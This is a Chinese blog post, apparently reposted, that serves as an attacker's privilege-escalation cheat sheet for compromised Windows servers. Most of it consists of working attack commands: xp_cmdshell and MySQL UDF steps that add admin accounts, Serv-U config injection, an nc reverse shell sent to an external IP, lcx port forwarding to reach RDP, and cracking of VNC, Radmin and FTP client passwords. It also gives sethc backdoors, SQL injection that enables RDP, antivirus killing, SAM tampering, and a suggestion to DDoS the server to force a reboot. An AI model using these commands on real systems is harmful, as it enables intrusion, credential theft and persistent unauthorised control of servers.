提权笔记本

标签：函数   编辑   最好   cmd   ogr   values   prot   路径   工具   

/*

转载请注明出处

ID：珍惜少年时

*/

21------------FTP //找到其FTP目录，破解其密码搜索,提之

22------------linux终端

23------------telnet //可以爆破,然后dos连接之，连接后添加用户开启终端端口，然后宣告拿下！

1433----------mssql提权 //需要找到sa密码,一般存在于web.config文件中,uid pwd sa为关键字，找到该文件后Ctrl+f搜索关键字提之

3306----------mysql提权 //需要找到root密码,提之.

4899----------radmin //破解注册表提权

43958---------serv -u提权 //一般shell自带的都有，直接使用自带的进行提权尝试即可。

5900----------vnc提权 //VNC提之

[此目录大多可读可写]
C:\windows\temp\

[服务器常见的杀毒软件]
360tray.exe 360实时保护
ZhuDongFangYu.exe 360主动防御
KSafeTray.exe 金山卫士
McAfee McShield.exe 麦咖啡
SafeDogUpdateCenter.exe 安全狗

【filezilla提权】
提权思路：

【mssql提权/1433提权/sa提权/sa提权/mssql数据库提权】
关于mssql 的注入，可以使用sqlninja 来恢复组建等操作，该工具与sqlmap 不同的是偏向于获得shell。kali里有。
思路：最主要的还是找到mssql数据库的账号密码，找到之后执行mssql命令提权，如果cmd_shell组建被删除也可以进行自己修复（工具包里的sql查询分析器）
也可以在aspx的shell下进行操作，你懂的啦~哦，对了，可以用sql综合利用工具直接连接了之后进行dos操作！你懂~~如果说3389没开，也可以用mssql执行
命令开启啦，至于命令嘛 百度一下你就知道

找配置文件，配置文件一般都是web.config或者conn.asp再或config.asp之类的文件（也可以到注册表找sa密码）

在配置文件内找到mssql连接信息,即mssql的账号密码等配置信息,uid，pwd即为其账号密码。直接在aspx马子哪儿找到

数据库选择mssql数据库，然后完整填写好数据库连接信息.然后直接在哪儿执行一下提权命令.

格式：exec master.dbo.xp_cmdshell ‘命令‘;--

SQL增加用户：exec master.dbo.xp_cmdshell ‘net user fcu xieyingshentouxiaozu /add‘;--
SQL提升权限：exec master.dbo.xp_cmdshell ‘net localgroup administrators fcu /add‘;--

倘若执行不了命令可能xp_cmdshell组建删除,执行该命令即可Use master dbcc addextendedproc(‘xp_cmdshell‘,‘xplog70.dll‘)

（在aspx环境下）开启cmd_shell方法
sqlExec:XP_cmdshell exec

（可以用sql查询分析器下）开启cmd_shell方法
连接上去后
执行以下代码：
EXEC sp_configure ‘show advanced options‘, 1
GO
RECONFGURE
GO
EXEC sp_configure ‘xp_cmdshell‘, 1
GO
RECONFIGURE
GO

Mssql一些sql语句：
1.检测与恢复扩展存储
判断xp_cmdshell扩展存储是否存在
and 1=(select count(*) from master.dbo.sysobjects where xtype = ‘x‘ AND name= ‘xp_cmdshell‘)

判断xp_regread扩展存储过程是否存在
and 1=(select count(*) from master.dbo.sysobjects where name=‘xp_regread‘)

恢复
;exec sp_dropextendedproc ‘xp_cmdshell‘
;exec sp_dropextendedproc xp_cmdshell,‘xplog70.dll‘

新建用户
;exec master..xp_cmdshell ‘net user fuchou$ fuchou /add‘
;exec master..xp_cmdshell ‘net localgroup administrators fuchou$ /add‘

【mysql提权/3306提权/3306端口提权/mysql注册表/mysql路径/phpmyadmin提权/phpmyadmin 提权/UDF提权/】
思路：UDF~执行mysql调用cmd_shell组建添加用户，然后捣鼓个vbs到重启那儿！让服务器重启一下，账户就自动加上了！嘻嘻~你懂
还有一个方法就是mof提权。
创建cmdshell的函数有两个。
一个是cmdshell
一个是sys_eval：create function sys_eval returns string soname ‘udf.dll‘
倘若有waf以致执can‘t open啥的可以结束掉waf“ntsd -c q -p PID 1234”后面加他的pid就可以了。

如果存在特殊情况：
提权时，当下载mysql的user.MYD数据库连接密码hash值无法用winhex等十六进制编辑器查看时：
本地搭建mysql，先停止本地mysql服务
将下载的user.MYD user.frm user.MYI替换本地文件，然后
cd mysqlbin
mysqld-nt --skip-grant-tables
重新打开一个cmd
mysql -u root
select user,password from mysql.user;

UDF提权；
[前提root权限]原理通过root权限导出udf.dll到系统目录下，可以通过udf.DLL调用cmd执行命令。
导出目录
c:\winnt\udf.dll 2000 [这两个都是mysql ]
c:\windows\udf.dll 2003 [数据库版本为5.0以下的 ]

找root密码,一般存在于config之类的配置文件里，上UDF,然后导出dll,然后提之

可能遇到的问题：1.找不到配置文件,直接马子带的搜索工具,搜一下你就找到
2.UDF导出失败，这个很常见！直接找到其mysql安装目录

Root密码可在mysql目录下的(user.MYD,一般是16位或者40位)该文件中找到,不过是经过加密的.直接用c32打开，头文件就是密码啦.去cmd5解密吧.拿到密码,UDF提权之。。。你懂。
如果密码看不见，或是组合不到40位，就本地安装一个mysql吧， 1、停止mysql服务 2、替换下载下来的3个文件（user.MYI user.MYD user.frm） 3、cmd切换到bin目录下，进入mysql安全模式，cmd命令：mysqld-nt --skip-grant-tables 4、重新打开一个cmd 切换到bin目录下，cmd命令：mysql -u root 版本不同有可能是：mysql -uroot -proot 5、最后查询一下就出来了select user,password from mysql.user;

mysql注册表的位置：HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\MySQL\ //在此可以看到mysql的安装位置

以下是mysql执行语句调用cmd_shell提权
mysql执行命令提权(账号：fuchou$ 密码：fuchou!@#)
mysql>create table a(cmd text); //表a 字段cmd text文本类型
mysql>insert into a values ("set wshshell=createobject(""wscript.shell"")");
mysql>insert into a values ("a=wshshell.run(""cmd.exe /c net user fuchou$ fuchou!@# /add"")");
mysql>insert into a values ("b=wshshell.run(""cmd.exe /c net localgroupo administrators fuchou$ /add"",0)");
mysql>select * from a into outfile "c://docume~1//administrator//「开始」菜单//程序//启动//choukuo.vbs";

然后让服务器重启（ms12010）就好了！

以下是mof提权
1.直接上传mof.php直接执行dos命令提权~
2.mof文件里捣鼓个用户加之[未完~~]

【21端口FTP提权】

如果21端口开放那么可能网站是通过Ftp进行管理，此时我们可以尝试找到其Ftp文件目录，覆盖住FTP的文件即可提权。或者爆破Ftp

【lcx内网转发/内网提权/neiwangzhuanfa/neiwangtiquan/端口转发/内网转发/】

梗概：将服务器的3389通过lcx.exe转发到本地的
将服务器的3389端口转发到本地的19端口，然后我们外网电脑监听19端口并且转发到9999端口.从而就将服务器的3389端口间接地转发到了9999端口.

本地执行
lcx.exe -listen 19 9999 /*15为监听端口，9999为转发端口*/
shell执行
lcx.exe -slave 服务器IP/即shell IP/即目标要转发的IP 19 127.0.0.1 3389

连接 远程桌面填上地址为 服务器内网IP：9999

###源于互联网，恐咱写的不够全面
端口转发

适用情况:
1.目标主机在内网,我们无法链接(这种情况和第二种适用方法一样)
2.目标主机有防火墙,阻断我们链接
lcx.exe -slave 你的IP 你监听的端口 肉机IP 要转发的目标主机端口
防火墙一般是会阻断由外向内的通信,而不会阻断由内向外的通信,因此我们可以利用这个原理实现端口转发

本机: lcx -listen 2222 3333

2222为转发端口，3333为本机任意未被占用的端口

肉鸡：lcx -slave 119.75.217.56 2222 127.0.0.1 3389

119.75.217.56 为本机IP,2222为转发端口，127.0.0.1为肉鸡内网IP，3389为远程终端端口

3389连接时格式 127.0.0.1:3333
### 结束###

### nc反弹：
webshell下面执行命令有时候没有回显，在nc反弹的窗口下面是有回显的。
通过webshell反弹的cmd继承IIS的权限，一般权限较低。但是还是很方便执行系统命令的

E:\web\nc -vv 125.92.61.202 8080 -e E:\web\cmd.exe（webshell执行的）
nc -vv -l -p 8080 （本机执行的）
-l：监听端口，监听入站信息
-p：后跟本地端口号
-v：显示端口的信息，如果使用-vv的话，则会显示端口更详细的信息

E:\web\nc -l -p 110 -t -e E:\web\cmd.exe
telnet 连接服务器ip 端口
-l 监听本地入栈信息
-p port 打开本地端口
-t 以telnet形式应答入栈请求
-e 程序重定向
### 结束###

【Pcanywhere提权/Pcanywhere远控提权】

思路：找到安装目录破解（破解软件：symantec pcanywhere password crack）pcanywhere配置文件（PCA.serven.CIF），然后本机搭建pcawhere环境进行远程连接目标机

以下是详细步骤
pcanywhere默认安装目录：C:\Program Files\sysmantec\pcanywhere

需要在本地安装此软件，然后找到后缀为cif的（在其安装目录的Hosts目录下）。保存至本机。并下载专门的pcanywhere破解软件进行破解。

破解完成后打开Pcanywhere远程软件新建一个主控端连接目标服务器。
具体操作如下；

选择主控端-右键选择高级-设置（输入目标IP）-安全性选项（设置级别：pcanywere编码）-成功操作完成

点击你刚才新建的主控端右击开始远程遥控，然后需要登录，直接输入你破解的CIF的帐号密码登录即可。

以下非本人所笔，来源于互联网因(怕各位觉得俺写的不够全面）
### pcanywhere提权：

在服务器里安装好软件，添加被控端，设置好密码就ok了，在本机安装好软件，添加主控端，填上ip，密码等，选好加密 方式（任一都可以），直接连接

pcanywhere所开放的端口5631、5632

利用工具破解*.cif文件

默认路径： C:\Documents and Settings\All Users\Application Data\Symantec\pcAnywhere\Hosts

找到hosts目录的.cif文件。然后本地明小子破解。
### 结束###

【serv-u提权/serv -u提权/serv u提权/43958提权/43958端口提权】
serv-u默认安装目录:C:\Program Files\rhinosoft.com\serv-U
serv-u密码文件：ServUDaemon.ini
端口如果改了可以通过pid查看
或者可以到serv u的配置文件里面去找！
SerUDaemon.ini这个文件
lccalsetuportNo=端口

----------------------------------
--管理员修改了serv u 密码--------
----------------------------------
进入其安装目录找到serv u的ServUDaemon.ini这个文件（该文件时储存密码的）,然后将密码丢到shell里面去，然后进行serv-u提权，不过一般管理员并不修改serv-u的密码

----------------------------------
----------无修改权限提权----------
----------------------------------
直接在大马自带的serv-u自带的那里提权，倘若失败，请尝试下列思路。

直接下载servuadmin.exe（在serv-u默认安装目录下）利用C32打开搜索其IP（或搜索port，LocalSetupPassword=，localadministrator），IP后面的第一个
为帐号，账号后的即为密码。（默认的账号为localadministrator）然后再到serv-u自带的提权窗口进行修改帐号
密码从而提权。

----------------------------------
------------修改权限提权----------
----------------------------------

进入其serv-u默认安装目录（小技巧：桌面找到他的安装快捷方式下载下来查看那），找到ServUDaemon.ini该文件，尝试是否可以修改，倘若可以，便可执行以下步骤，

反之即为无修改权限提权，添加一个user。然后添加以下内容；

[USER=fcz|1] //用户名
Password=202CB962AC59075B964B07152D234B70 //用户密码加密后的密文，密码为123
HomeDir=c:\ //默认根目录
TimeOut=600 //超时时间设置
Maintenance=System //权限
Access1=C:\|RWAMELCDP //可访问的目录及权限
Access2=d:\|RWAMELCDP //可访问的目录及权限
Access3=e:\|RWAMELCDP //可访问的目录及权限
注解：斜杠为理解之用，并非也要予以添加。

添加完成后即可开始邪恶计划，打开Dos

键入以下内容；

ftp 目标IP 然后回车然后输入你刚才新建的用户名即为fcz和密码123，然后执行以下命令；
quote site exec net user fuchouzhe 123 /add
quote site exec net localgroup administrators fuchouzhe /add

完工。

小知识；bye命令即为退出目标计算机。
如果管理员将serv u的密码给改了，可以到这里去查看查看密码，然后在大马哪里修改并进行serv u提权

以下源于互联网，害怕俺写的不够全面。
### Serv-U目录有修改提权：

ServU 密码加密存储方法
首先随机生成2位字符(从a-z小写字符).

再将用户原始密码与这2位随机字符合并成为新的密码字符.

如: 用户原始密码为a,随机生成字符为dx,则合并后新的密码字符串为:"dxa"

再使用新密码字符串进行MD5 Hash运算.

dxa=F2319AE3B312103BB3259CA8242DD16C

然后再存储到ini文件,存储方法为2位随机字符加上新密码字符的MD5 Hash值.

如下:

[USER=a|1]
Password=dxF2319AE3B312103BB3259CA8242DD16C

ServU 密码破解方法:

除去前2位随机字符获得F2319AE3B312103BB3259CA8242DD16C.

把该MD5 Hash值存入暴力破解工具,产生字典时注意前2位密码必定是dx.

F2319AE3B312103BB3259CA8242DD16C=dxa

提权思路：Serv-U 修改serv-u配置文件 添加超级管理员

步骤：
[USER=lx|1]
Password=uc8270A0A37BE006573C96DB29DF42DEE8
HomeDir=c:\
TimeOut=600
Maintenance=System
Access1=C:\|RWAMELCDP

用cmd登陆ftp，，然后在执行下列命令添加用户

quote site exec net user 用户 密码 /add 添加用户
quote site exec net localgroup administrators 用户 /add 添加到管理员组

C:\Program Files\RhinoSoft.com\Serv-U 默认端口43958 修改的文件ServUDaemon.ini (默认路径)

注意：添加失败的原因可能添加的用户名重名，试试其他组合的用户名，，User2=pp|1|0 （用户的顺序一定要设置好）
### 结束###

【flashfxp提权】
思路：下载flashfxp下的配置文件（quick.dat）覆盖到本地，然后星号查看器查看出密码，你懂啦~

falshfxp默认安装目录：C:\Program Files\flashfxp

在其安装目录中找到以下文件并予以下载

quick.dat

然后本机下载且安装flashfxp，将以上三个文件放置于本件安装安装flashfxp目录下，会提示已经有了是否覆盖

直接点击确定覆盖。然后再次打开flashfxp快速连接，在历史的那里就直接有目标机的地址了。帐号轻而易举的获

得（用星号查看器），如此便OK。可以尝试用ftp密码当作3389的密码登录试试！

【写入启动项提权/启动项里提权】

查看C:\Documents and Settings\All Users\「开始」菜单\

是否可读可写，倘若可写请输入以下代码。

@echo off
net user xieying fuchou /add
net localgroup administrators xieying /add

如此一来仅需等待服务器重启即可。可以用dos执行重启命令哟。或者D他，使其重启。

【VNC密码破解提权/vnc提权/5900端口开放/5900开放/5900入侵/】
思路：通过注册表读取出vnc十进制的密码，然后转化为十六进制，最后用vncx4.exe输入十六进制的密码破解，远程连接之！

默认安装目录：C:\Program Files\RealVNC\VNC4

直接进注册表（HKEY_CURRENT_USER\Software\ORL\WinVNC3\Password）获取密码即可，如果说跟路劲无效什么的，那可能是权限不够，以文本形式打开以后

ctrl+f搜索password

读出来的密码是十进制 要转换为16进制，然后将十六进制的用vncx4.exe破解

使用方法如下；

dos下使用vncx4.exe执行命令vncx4.exe -W //W是大写的。（输入转换十六进制后的数值）

破解成功就直接用vnc直接连接呗。
以下非本人所笔，来源于互联网因(怕各位觉得俺写的不够全面）
### vnc远控提权：

这二个目录有关于vnc安装的信息，有此目录代表服务器安装了vnc

C:\Program Files\RealVNC\VNC4
C:\Documents and Settings\All Users\「开始」菜单\程序\RealVNC

Vnc开发的端口为5900 密码存放在注册表中 地址为
HKEY_LOCAL_MACHINE\SOFTWARE\RealVNC\WinVNC4\password （vnc4密码在这个键值里）
HKLM\SOFTWARE\RealVNC\WinVNC4\PortNumber （vnc4的端口）

HKCU\Software\ORL\WinVNC3\Password （vnc3的密码）
HKCU\Software\ORL\WinVNC3\PortNumber （vnc3的端口）

1.找到vnc4.0版本的注册表键值，
2.然后转换成16进制
3.用vncx4破解
4.本地安装vnc
5.本地连接

密码的破解：
cmd切换到vnc4的目录，，
命令行录入：vncx4 -W
备注：此处参数W是大写
然后顺序录入上面的每一个十六进制数据，每录完一个回车一次就行了。

### 结束###

【radmin/4899/4899提权/radmin提权】
思路：读取radmin密码知晓密码的十进制然后转化为十六进制得到正确的密码，远程连接

以下是密码储存注册表地址：
HKEY_LOCAL_MACHINE\SYSTEM\RAdmin\v2.0\Server\Parameters\Parameter
以下是端口储存注册表地址：
HKEY_LOCAL_MACHINE\SYSTEM\RAdmin\v2.0\Server\Parameters\port

读取出来的是十进制的密码，要转换成十六进制。记得要小写！！！

现在仿佛很多shell里面都自带的有radmin提权，你懂~

然后用[Radmin_Hash.exe]进行用HEX直接连接（连接的时候记得小写）.可能因为版本的缘故，仿佛现在radmin已经更新到3.0了 上面这个仿佛可能不管用。
--------------------------------------------------------------------------------
常见虚拟主机常见路径
D:\virtualhost\web580651\www\ 新网虚拟主机

F:\usr\fw04408\xpinfo\ 万网虚拟主机

D:\hosting\wwwroot\ Prim@Hosting虚拟主机

e:\wwwroot\longzhihu\wwwroot\ 华众虚拟主机

d:\freehost\zhoudeyang\web\ 星外虚拟主机主机

D:\vhostroot\LocalUser\gdrt\ 星外分支

f:\host\wz8088\web\ 星外分支

D:\vhostroot\localuser\ vhostroot

###源于互联网，恐咱纰漏
radmin2.1提权

RADMIN的注册表项位于HKEY_LOCAL_MACHINE\SYSTEM\RAdmin\v2.0\Server\Parameters\ Parameter（在这个键值保存着密码）

在本机安装radmin，，把上面的密码键值导出，上传到webshell的可写目录中

cmd下执行下列2行的命令：
REGEDIT -E C:\123.REG HKEY_LOCAL_MACHINE\SYSTEM\RAdmin\v2.0\Server\Parameters （导出密码文件到c盘，c盘要有可写目录）
此步骤可以省略，直接导入本机的密码，实验通过。
REGEDIT -s C:\456.REG HKEY_LOCAL_MACHINE\SYSTEM\RAdmin\v2.0\Server\Parameters （导入密码到注册表）

然后本机连接服务器ip，密码是本地radmin密码
###结束###

【LPK提权/lpk 提权/LPKtiquan/lpk tiquan】
所用工具：tools lpk sethc v4.0.exe

要提前设置好热键，然后连接远程的时候按五下shift 然后在按你设置的热键，多按几次吧，

lpk.dll存在于可执行程序目录中会自动被调用，直接放到网站上面去，然后执行一个exe就可以触发该漏洞。

【星外主机/星外虚拟主机/星外提权/7i24/freehost/7i24目录/freehost目录/xingwai/xingwaizuji/】

如何知道是不是星外主机？
1.看到网站目录在这个文件夹下（freehost）或者（7i24）则很有可能是星外了
2.asp大马里点击程序，存在“7i24虚拟主机管理平台”“星外主机”之类的文件夹
3.开始菜单哪儿也是可以看到底

拿到星外果断先登陆一下他默认账号密码。

注：在星外中一般不允许上传解析格式的文件呢（asp之类的）但是阔以上传.com或者.txt的

星外主机提权思路（1.ee.exe提权 2.vbs提权 3.注册表获得sa密码/星外sa提权）

[One]ee.exe提权法
找个可读可写目录上传ee.exe
c:\Program Files\Microsoft SQL Server\100\Shared\ErrorDumps\ee.exe
cmd命令：/c c:\windows\temp\cookies\ee.exe-i（获取星外帐号的id值，例如回显：FreeHostID：724）
接着命令：/c c:\windows\temp\cookies\ee.exe-u724（获取星外的帐号密码）
远程连接之

[Two]vbs提权法
找个可读可写目录上传cscript.exe和iispwd.vbs
cmd执行：/c "c:\windows\temp\cookies\cscript.exe"c:\windows\temp\cookies\iispwd.vbs
意思是读取iis，不但可以获取星外的帐号密码（在最下），还可以看到同服务器上的所有站点的目录。
读取到了数据以后找一下ctrl+f搜索一下“7i24”在其旁边就有加密的账号密码
默认帐号：freehostrunat
默认密码：fa41328538d7be36e83ae91a78a1b16f!7 /*明文，没有加密直接登录！*/
这个用户是安装星外时自动建立的，已属于administrators管理组，而且密码不需要解密，直接登录服务器即可！

[Three]sa提权
星外sa密码注册表位置：HKEY_LOCAL_MACHINE\SYSTEM\LIWEIWENSOFT\INSTALLFREEADMIN\11

[PS]：安全模式大部分是存在于星外主机上，其他主机出现较少！
而且星外主机提权最好用aspx大马，因为权限比较高，提权成功率就比较高！

星外常写目录：
C:RECYCLER
C:windowstemp
e:recycler
f:recycler
C:phpPEAR
C:WINDOWS7i24.comFreeHost
C:phpdev
C:System Volume Information
C:7i24.comserverdoctorlog
C:WINDOWSTemp
c:windowshchiblis.ibl
C:7i24.comiissafelog
C:7i24.comLinkGatelog
C:Program FilesThunder NetworkThunder7
C:Program FilesThunder NetworkThunder
C:Program FilesSymantec AntiVirusSAVRT
c:windowsDriverPacksCAM2
C:Program FilesFlashFXP
c:Program FilesMicrosoft SQL Server90SharedErrorDumps
C:Program FilesZendZendOptimizer-3.3.0
C:Program FilesCommon Files
c:Documents and SettingsAll UsersApplication DataHagel TechnologiesDU Meterlog.csv
c:Program Files360360SafedeepscanSectionmutex.db
c:Program FilesHeliconISAPI_Rewrite3error.log
c:Program FilesHeliconISAPI_Rewrite3Rewrite.log
c:Program FilesHeliconISAPI_Rewrite3httpd.conf
c:Program FilesCommon FilesSymantec SharedPersist.bak
c:Program FilesCommon FilesSymantec SharedValidate.dat
c:Program FilesCommon FilesSymantec SharedValidate.dat
C:Program FilesZendZendOptimizer-3.3.0docs
C:Documents and SettingsAll UsersDRM
C:Documents and SettingsAll UsersApplication DataMcAfeeDesktopProtection
C:Documents and SettingsAll UsersApplication Data360safesoftmgr
C:Program FilesZendZendOptimizer-3.3.0libOptimizer-3.3.0php-5.2.xZendOptimizer.dll
C:Documents and SettingsAll UsersApplication DataMicrosoftMedia Index

【N点虚拟主机】
如何判断是否为你n点虚拟主机？
1.网站存在于npointhost该目录下
2.用户信息在说明（description）这儿看到N点虚拟主机
即可说明服务器存于N点虚拟主机内

N点主机提权思路
One.利用破解脚本破解sa密码.然后直接sa提权
其步骤：在网站根目录有一个host_data的文件夹，进去将其数据库下载，找到hostcs表下的mssqlpass密码（有进行加密），然后用破解脚本（提权仓库有）,将sa密文放到破解脚本里面去，然后直接丢到
网站，然后浏览之，即可看到正确的sa密码，然后可sa提权之。

过狗提权/bypasssafedog提权/过够/过狗总结/安全狗/safe dog/safedog
1.直接修改管理员密码
2.直接修改guest
然后reg export "HKEY_LOCAL_MACHINE\SAM\SAM\Domains\Account\Users\000001F4" "c:\1.reg" 导出来 下载后修改 把V删除 把1F4改成1F5 然后再导入 就成了
密码就是1了
3.如果说权限是system的话直接用wce.exe直接读取hash（使用方法：）wce.exe -l
4.当然system也可以上远控
+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
+EXP那些事
+
+ms15-051------------2008 r2
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+

+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
+提权经验笔录
+
+ ◇.提权前（tasklist）看一下在运行那些东西，看一下有没有杀毒软件之类的.然后对症下药.
+
+ ◇.cmd无法执行/cmd拒绝访问/
+ 1.防护软件拦截taskkill /f /im ZhuDongFangYu.exe
+ 2.cmd被降权
+ 3.组建被删除
+ 解决思路：找一个可读可写的目录上传cmd或者传一个aspx木马
+ 4.可读可写的上传上去了还是拒绝访问，这时候可能是因为没有权限执行，上传一个rar然后解压到可以执行的地方去。就可以解决！
+
+ ◇.有时候net user admin admin /add不行的话就用net user admin /ad
+
+ ◇.有时候明明可以添加上的用户，却没有添加上，试试把密码改的难一些，管理员可能对密码进行了要求的！
+
+ ◇.wscript.shell组件不支持，那就传个aspx马试试,aspx马不需要该组件支持。
+
+ ◇.如果不能直接添加用户，试试修改管理员账号密码：net user adminitrator fuchouzhe //将管理密码修改为fuchouzhe
+
+ ◇.如果systeminfo看到补丁情况（三百个大约为平衡点）很少的话，直接上EXP提权试试
+
+ ◇.[iis6.0exp状况]当使用iis6.0exp提权时候，正在执行“net use” 却返回（提示）“Can not find wmiprvse.exe”
+
+ 此时我们仅需关闭wmiprvse.exe该进程即可.用命令关闭wmiprvse该进程：taskkill /f /t /im .exe
+
+ ◇.有时候程序所对应的端口没有开（例如:mysql开启了却没有开放3306端口），极有可能是被修改了端口
+ 这个其实和寻找终端端口类似,比如有运行mysql却没有开放3306,怎么找出mysql被更改的端口呢。
+ tasklist /svc执行后瞅见mysql运行，找到其对应PID，然后netstat -ano看一下PID对应的端口即可。
+
+ ◇.如何查看终端端口/远程端口/远程终端/远程连接/3389/开3389/远程问题/远程连接/3389连接/开启3389/开启终端端口
+ （1）执行cmd键入“tasklist/svc & netstat -ano”然后找到（svchost.exe）TermService所对应的PID，然后在下面找到PID所对应的端口，即为终端端口
+ 亦或先执行tasklist /svc查看Termserver对应的PID，然后再输入命令netstat -ano找PID对应的开放端口
+ （2）aspx大马哪里直接查看“系统信息”
+ （3）找注册表（注：PortNumber即为远程端口）
+ ①.HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\Wds\rdpwd\Tds\tcp\
+ ②.HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp\PortNumber
+ （4）如果是不知道终端端口的话，尝试一下跑出所有其开放的端口（用nmap跑之）然后试之,亦或可以读取注册表然后日之
+
+ （5）SQL语句直接开启3389/SQL语句直接开启3389
+ [3389注册表位置：HKEY_LOCAL_MACHINESYSTEMCurrentControlSetControlTerminalServerDenyTSConnections]
+ [其中键值DenyTSConnections 直接控制着3389的开启和关闭，当该键值为0表示3389开启，1则表示关闭。]
+ [而MSSQL的xp_regwrite的存储过程可以对注册进行修改，我们使用这点就可以简单的修改DenyTSConnections键值，]
+ [从而控制3389的关闭和开启]
+ 开启3389的SQL语句：
xxx.com/fuchou.asp?id=100;exec master.dbo.xp_regwrite’HKEY_LOCAL_MACHINE’,’SYSTEMCurrentControlSetControlTerminal Server’,’fDenyTSConnections’,’REG_DWORD’,0;–
+ 关闭3389的SQL语句：
xxx.com/fuchou.asp?id=100;exec master.dbo.xp_regwrite’HKEY_LOCAL_MACHINE’,’SYSTEMCurrentControlSetControlTerminal Server’,’fDenyTSConnections’,’REG_DWORD’,1;–
+

+
+ ◇.net被禁用/net user不行
+ 解决方法挺多的，试试net1，不行的话上pr，iis6.0试试0day
+
+ ◇.sa提权困难/sa提权问题/
+ 若提示：SQL Server 阻止了对组件 ‘xp_cmdshell‘ 的 过程 ‘sys.xp_cmdshell‘ 的访问，因为此组件已作为此服务器安全配置的一部分而被关闭,
+系统管理员可以通过使用 sp_configure 启用 ‘xp_cmdshell‘。有关启用 ‘xp_cmdshell‘ 的详细信息，请参阅 SQL Server 联机丛书中的 "外围应用配置器"。
+ 则没有开启那个组件的支持.自己开启以下就可以（需根据mssql version数据库版本来搞.在sql exec那里开启.）最终添加命令时（sqlexec）要选择sql servver exec来执行添加用户命令.
+
+ ◇.Active不能创建对象，一个aspx，exp，配合用。如果是iis的试一下iisup.exe，或者执行工具包里的bat

+ 把
试一试。
+
+ ◇.安全狗怎么提权？
+ 如果是system权限直接杀死狗，即可
+ 但是大多数都不是system权限，所以呢，传一个免杀的远控最好不过了
+ 弄一个后门，然后调用任务管理>
‘,关掉安全狗
+ 用杀狗的exp。
+ 把服务器打重启吧,ddos。没事12020/12010如果没有必要最好不要，危害性极大。
+ ◇.shift后门替换位置/shift后门/shift服务后门
+ C:\WINDOWS\system32\sethc.exe
+ C:\WINDOWS\system32\sethc.exe.exe 将sethc.exe换成自己的shft就可以了。
+
+ ◇.cmd执行exp没有回显/exp无回显/exp没有回显/cmd exp 回显/exp cmd　回显/iis6.0无回显/iis6.0没有回显/
+　　　如果说是这样的话，可以尝试shell里面cmd路径的路径填写exp的路劲，在语句哪儿执行“net user fuchou fuchou /add”
+ 例：
+ cmd路径：c:\windows\temp\iis6.0.exe
+ 语句 ：c:\windows\temp\ms08067.exe //也可以直接执行“net user admin admin /add” 如果说直接执行不了，的话
+ 可以再传一个cmd放在语句块执行.例（c:\windows\temp\cmd.exe "net user fuchou fuchou /add"）
+
+ ◇.mysqlroot账号密码的查找/mysql root账号密码
+ 1.在敏感文件下查找，比如config之类的
+ 2.在mysql的安装目录下找到mysql该文件夹的目录，再次目录下含有一个user.MYD的文件，下载下来。打开你会root账号密码
+ 3.爆破吧。
+ ◇.getpass使用方法
+ getpass.exe >1.txt
+ [社工演义法]
+
+ ◇.在提权过程当中，实在没办法，必要的时候可以拿服务器的注册所有人和注册的组织来进行社工进而拿下服务器权限！
+
+ ◇.同上也是属于一个社工的思路，如果找到mysql的话可以用mysql的密码当作终端端口的密码来进行登录，说不准有意外收获！
+
+
+
+
+
+
+
+
+
+
+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++

【转载】注册表中一些敏感的位置/注册表/注册表敏感目录/
HKEY_LOCAL_MACHINESOFTWAREMicrosoftMSSQLServerMSSQLServerSuperSocketNetLibTcp Mssql端口
HKLMSYSTEMCurrentControlSetControlTerminal Server DenyTSConnections 远程终端 值为0 即为开启
HKEY_LOCAL_MACHINESOFTWAREMySQL AB mssql的注册表位置
HKEY_LOCAL_MACHINESOFTWAREHZHOSTCONFIG 华众主机注册表配置位置
HKEY_LOCAL_MACHINESOFTWARECat SoftServ-UDomains1UserList serv-u的用户及密码（su加密）位置
HKEY_LOCAL_MACHINESYSTEMCurrentControlSetControlTerminalServer WinStationsRDP-Tcp 在该注册表位置PortNumber的值即位3389端口值
HKEY_CURRENT_USERSoftwarePremiumSoftNavicatServers mysql管理工具Navicat的注册表位置，提权运用请谷歌
HKEY_LOCAL_MACHINESYSTEMRAdminv2.0ServerParameters Radmin的配置文件，提权中常将其导出进行进行覆盖提权
HKEY_LOCAL_MACHINESYSTEMControlSet002ServicesMSFtpsvcParametersVirtual Roots IIS注册表全版本泄漏用户路径和FTP用户名漏洞
HKEY_LOCAL_MACHINEsoftwarehzhostconfigSettingsmastersvrpass 华众主机在注册表中保存的mssql、mysql等密码
HKEY_LOCAL_MACHINESYSTEMLIWEIWENSOFTINSTALLFREEADMIN11 星外主机mssql的sa账号密码，双MD5加密
HKEY_LOCAL_MACHINESYSTEMControlSet002ServicesMSFtpsvcParametersVirtual RootsControlSet002 星外ftp的注册表位置，当然也包括ControlSet001、ControlSet003

--------------------------------------------------------------------------------------------
|提权技巧大全：
|1.如果连接服务器出现连接段超过最大请求/终端超出最大允许连接，直接运行mstsc /admin
|2.开始-运行（键入mstsc）直接快捷启动远程桌面连接.
|3.怎么找同服务器支持aspx的站点？利用bing搜索：ip:服务器ip aspx
|4.
|5.
|
|
|
--------------------------------------------------------------------------------------------
| FTP命令
| 提权命令：quote site exec net fuchou fuchou /add ‘返回200或者TID=33则说明成功执行。添加OK直接终端连接日之
| quote site exec net localgroup administrator fuchou /add
|
|
|

--------------------------------------------------------------------------------------------
| 杂谈绕过waf/绕过防火墙/
| 1. rar在dos下的执行/压缩文件在dos下的执行
| 思路：可以把马子打包到rar里面然后在解压。
| 例： c:\winrar\winrar.exe a -k -r -s -m3 d:\1.rar c:\test //将c:\test文件打包到d盘的1.rar
| 用途：打包任意文件
|
|
|
|
|
|
|
|
|
|
|
|
|--------------------------------------------------------------------------------------------
| /08r2/windows2008 exp/08 r2 exp/2008
| 14058 15010 15015 15051 15077 16016 16032
|
|
|
|
|
|

未完成. 待续....

提权笔记本

标签：函数   编辑   最好   cmd   ogr   values   prot   路径   工具   

原文地址：http://www.cnblogs.com/xishaonian/p/6031556.html